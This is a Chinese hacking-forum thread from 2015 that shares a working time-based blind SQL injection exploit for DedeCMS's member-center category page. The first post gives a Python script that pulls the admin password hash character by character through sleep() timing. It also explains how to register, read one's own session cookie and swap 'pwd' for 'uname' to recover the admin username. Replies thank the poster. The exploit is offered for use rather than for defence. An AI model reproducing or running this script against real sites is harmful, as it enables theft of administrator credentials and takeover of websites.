Dede20150618延时注入exp

社区服务
高级搜索
猴岛论坛电脑百科Dede20150618延时注入exp
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
2个回复

[技术小组]Dede20150618延时注入exp

楼层直达
语 

ZxID:17504384

我不知道将去何方 但我已在路上

举报 只看楼主 使用道具 楼主   发表于: 2015-12-30 0
— 本帖被 木弦歌 执行加亮操作(2015-12-30) —
原文:http://bbs.blackbap.org/thread-7876-1-1.html懒得看视频,所以找了一下EXP分享给大家http://www.wooyun.org/bugs/wooyun-2015-0127787想不通厂商为什么忽略以下引用至http://www.52py.org/thread-1245-1-1.html-----------------------------------------------------------------------------------------------------------------------------------
需要修改的地方是cookie ,因为是会员中心的注入首先要能注册,注册完成后添加一个分类如图
在地址栏输入 javascript:document.write(document.cookie);   得到自己的cookie
得到的cookie 替换脚本中的cookie
就可以愉快的跑密码了
跑用户名只需要把脚本中的pwd 换成uname就OK了
Python:[font='microsoft yahei']
  1. import urllib2
  2. import time
  3. opener = urllib2.build_opener()
  4. opener.addheaders.append(('Cookie', 'PHPSESSID=thr71ua1g91j9d5lf79tr70ri1; DedeUserID=2; DedeUserID__ckMd5=6425e9e8f081fd4b; DedeLoginTime=1450059059; DedeLoginTime__ckMd5=0cae1010080d973a; last_vtime=1449818368; last_vtime__ckMd5=a8cc9e405d9da0bd; last_vid=tmdsb; last_vid__ckMd5=c6de842f1764c614'))
  5. payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
  6. name = ""
  7. for i in range(1,21):
  8.     for p in payloads:
  9.         s1 = "%s" %(i)
  10.         s2 = "%s" %(ord(p))
  11.         s = "http://localhost/d2/member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a'%20and%20`'`.``.mtypeid%20or%20if(ascii(substr((select%20pwd%20from%20dede_admin%20limit%201),"+s1+",1))%3d"+s2+",sleep(3),0)%20and%20mtypeid%3d1%23]=w&_FILES[mtypename][size]=.xxxx"
  12.         start_time = time.time()
  13.         try:
  14.             req = urllib2.Request(s)
  15.                         
  16.             req_data=opener.open(req,timeout=10)
  17.             if time.time() - start_time > 2.0:
  18.                 name = name+p
  19.                 print name+'.....'
  20.         except urllib2.URLError,e:
  21.              break
  22. print 'password is %s'  % name
[color=rgb(51, 102, 153) !important]复制代码[font='microsoft yahei'][color=rgb(51, 102, 153) !important]
本帖de评分: 1 条评分 DB +100
DB+100 2015-12-31

电脑板块奖励

引用

船在海上 马在山中 前方有大山大河

世界有不绝风景 我有坚持到底的决心
语 

ZxID:17504384

我不知道将去何方 但我已在路上

举报 只看该作者 沙发   发表于: 2015-12-30 0
Exp属于漏洞类型  无需杀毒
引用

船在海上 马在山中 前方有大山大河

世界有不绝风景 我有坚持到底的决心
阿里云服务器

ZxID:12008696

等级: 禁止发言

举报 只看该作者 板凳   发表于: 2015-12-30 0
谢谢分享
« 返回列表
发帖 回复